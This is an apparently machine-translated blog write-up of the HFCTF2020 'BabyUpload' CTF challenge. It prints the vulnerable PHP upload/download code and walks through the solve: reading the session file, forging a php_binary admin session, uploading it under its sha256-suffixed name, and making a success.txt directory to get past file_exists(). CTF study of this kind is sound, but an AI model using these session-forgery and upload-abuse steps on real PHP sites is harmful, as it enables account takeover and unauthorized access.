当前位置:网站首页>[hfctf2020]babyupload session parsing engine
[hfctf2020]babyupload session parsing engine
2022-07-07 01:05:00 【-Gardenia blue-】
<?php
error_reporting(0);
session_save_path("/var/babyctf/");//session Storage location
session_start();
require_once "/flag";
highlight_file(__FILE__);
if($_SESSION['username'] ==='admin')
{
$filename='/var/babyctf/success.txt';
if(file_exists($filename)){
safe_delete($filename);
die($flag);
}
}
else{
$_SESSION['username'] ='guest';
}
$direction = filter_input(INPUT_POST, 'direction');//filter_input() Function gets input from outside the script (post) Variable direction
$attr = filter_input(INPUT_POST, 'attr');//post Variable attr
$dir_path = "/var/babyctf/".$attr;// Splicing path $dir_path =/var/babyctf/$attr
if($attr==="private"){
$dir_path .= "/".$_SESSION['username'];//$dir_path =/var/babyctf/private/$_SESSION['username']
}
if($direction === "upload"){
try{
if(!is_uploaded_file($_FILES['up_file']['tmp_name'])){//is_uploaded_file() Function to check whether the specified file passes HTTP POST Upload
throw new RuntimeException('invalid upload');
}// Parameters up_file
$file_path = $dir_path."/".$_FILES['up_file']['name'];//$file_path =/var/babyctf/$attr/$_FILES['up_file']['name']
$file_path .= "_".hash_file("sha256",$_FILES['up_file']['tmp_name']);
//$file_path =/var/babyctf/$attr/$_FILES['up_file']['name']_ Of filename sha256
if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){// ../ ..\\ Restrict directory traversal
throw new RuntimeException('invalid file path');
}
@mkdir($dir_path, 0700, TRUE);// Create directory /var/babyctf/$attr/
if(move_uploaded_file($_FILES['up_file']['tmp_name'],$file_path)){
$upload_result = "uploaded";// File upload to $file_path Next P31
}else{
throw new RuntimeException('error while saving');
}
} catch (RuntimeException $e) {
$upload_result = $e->getMessage();
}
} elseif ($direction === "download") {
try{
$filename = basename(filter_input(INPUT_POST, 'filename'));// Read file name post Pass in filename
$file_path = $dir_path."/".$filename;//$dir_path =/var/babyctf/$attr/$filename
if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){// Restrict directory traversal
throw new RuntimeException('invalid file path');
}
if(!file_exists($file_path)) {// Does the file exist
throw new RuntimeException('file not exist');
}
header('Content-Type: application/force-download');
header('Content-Length: '.filesize($file_path));
header('Content-Disposition: attachment; filename="'.substr($filename, 0, -65).'"');
if(readfile($file_path)){// Does the file exist
$download_result = "downloaded";
}else{
throw new RuntimeException('error while saving');
}
} catch (RuntimeException $e) {
$download_result = $e->getMessage();
}
exit;
}
?>
The analysis of the code is as follows , obtain flag Way :
1、session Medium username Parameter to be admin
2、 stay /var/babyctf/success.txt There is
Information points available in code review :
There are four parameters direction attr filename up_file
1
direction by upload It is in the status of uploading files
attr The passed values are spliced into paths $dir_path = "/var/babyctf/".$attr
And there is one in the middle mkdir Function to create a directory @mkdir($dir_path, 0700, TRUE) Represents the directory where we are currently located by $attr Parameter determination
The file name will be changed to
$file_path =/var/babyctf/$attr/$_FILES['up_file']['name']_ Of filename sha256
That is, add a after the file name _ And documents msha256 value
up_file It is the parameter of the file we upload , You can use postman The tool uploads the files we need
2
direction by download When reading the file status
filename Parameter control file name , The file name can be cracked according to the encryption uploaded above
The path is as follows $dir_path =/var/babyctf/$attr/$filename
If the file exists , The contents of the file will be output
stay php in ,session The default storage file name of the file is sess_PHPSESSID, So we can use donwnload First look at the original session What's in the file , After analysis, we can know $attr We can temporarily set the parameter to null , Because at present, it doesn't have much to do with our operation
attr=&direction=download&filename=sess_609f6cd6a2922894f3843927cb598f65
You can find an invisible character , Different php engine ,session Different storage methods
php_binary: The storage mode is , The length of the key name corresponds to ASCII character + Key name + after serialize() Value processed by function serialization
php: The storage mode is , Key name + A vertical bar + after serialize() Value processed by function sequence
php_serialize(php>5.5.4): The storage mode is , after serialize() Value processed by function serialization
You can know our problem php The engine is php_binary, So take forgery session file
<?php
ini_set('session.serialize_handler','php_binary');
session_save_path('D:\Phpstorm\file\[HFCTF2020]BabyUpload');
session_start();
$_SESSION['username'] = 'admin';
To facilitate the calculation of file names , It is suggested to change the file name to sess Convenient for our later calculation
There is no format error ( Don't think it's usernames, Just get together , Key name username+serialize Value ,s Is the meaning of characters )
And then use it postman Tools use parameters up_file Parameters of the incoming sess file ( We don't have to be burp Construct file information on )
Remember to change the method to POST, I haven't changed my method at first ,GET Incoming can't come out …………
We can use the previous check method to see whether the upload is successful , But here we need to know first session file sha256 After the value of
echo hash_file('sha256','D:\Phpstorm\file\[HFCTF2020]BabyUpload\sess');
//432b8b09e30c4a75986b719d1312b63a69f1b833ab602c9ad5f0299d1d76a5a4
So we changed it filename that will do
Now? session The document was successfully forged , The purpose is how to upload success.txt file , Because the previous analysis shows that the file name needs to be added at the end _ as well as sha256 encryption , So this method doesn't work
if($_SESSION['username'] ==='admin')
{
$filename='/var/babyctf/success.txt';
if(file_exists($filename)){
safe_delete($filename);
die($flag);
}
}
Check it out file_exists What are the loopholes
Catalog ! We can use att Parameter to create a success.txt Folder , And then sess Pass in success Under the table of contents , Because there's a mkdir What we get is still ours session File value , But this file is judged to be in babyctf Under the table of contents !
bingo!!! Try it now
Go to the browser and put your own phpsession Change to our previous one sha256 The name of the file , To deceive us is admin
, Can get flag
边栏推荐
- Alexnet experiment encounters: loss Nan, train ACC 0.100, test ACC 0.100
- Make a simple graphical interface with Tkinter
- [牛客] B-完全平方数
- Deep learning environment configuration jupyter notebook
- Chapter 5 DML data operation
- [batch dos-cmd command - summary and summary] - jump, cycle, condition commands (goto, errorlevel, if, for [read, segment, extract string]), CMD command error summary, CMD error
- Advantages and disadvantages of code cloning
- Maidong Internet won the bid of Beijing life insurance to boost customers' brand value
- 重上吹麻滩——段芝堂创始人翟立冬游记
- Pytorch中torch和torchvision的安装
猜你喜欢
Stm32f407 ------- SPI communication
Installation and testing of pyflink
Telerik UI 2022 R2 SP1 Retail-Not Crack
pyflink的安装和测试
Service asynchronous communication
第五篇,STM32系统定时器和通用定时器编程
. Bytecode structure of class file
Configuring the stub area of OSPF for Huawei devices
Chenglian premium products has completed the first step to enter the international capital market by taking shares in halber international
【JVM调优实战100例】05——方法区调优实战(下)
随机推荐
Lombok makes ⽤ @data and @builder's pit at the same time. Are you hit?
Service asynchronous communication
What kind of experience is it to realize real-time collaboration in jupyter
Provincial and urban level three coordinate boundary data CSV to JSON
Slow database query optimization
动态规划思想《从入门到放弃》
什么是时间
C Primer Plus Chapter 14 (structure and other data forms)
详解OpenCV的矩阵规范化函数normalize()【范围化矩阵的范数或值范围(归一化处理)】,并附NORM_MINMAX情况下的示例代码
深度学习简史(二)
[牛客] [NOIP2015]跳石头
线段树(SegmentTree)
JS+SVG爱心扩散动画js特效
深度学习之环境配置 jupyter notebook
Meet the level 3 requirements of ISO 2.0 with the level B construction standard of computer room | hybrid cloud infrastructure
pytorch之数据类型tensor
【JokerのZYNQ7020】AXI_EMC。
Tensorflow 1.14 specify GPU running settings
Let's talk about 15 data source websites I often use
Summary of being a microservice R & D Engineer in the past year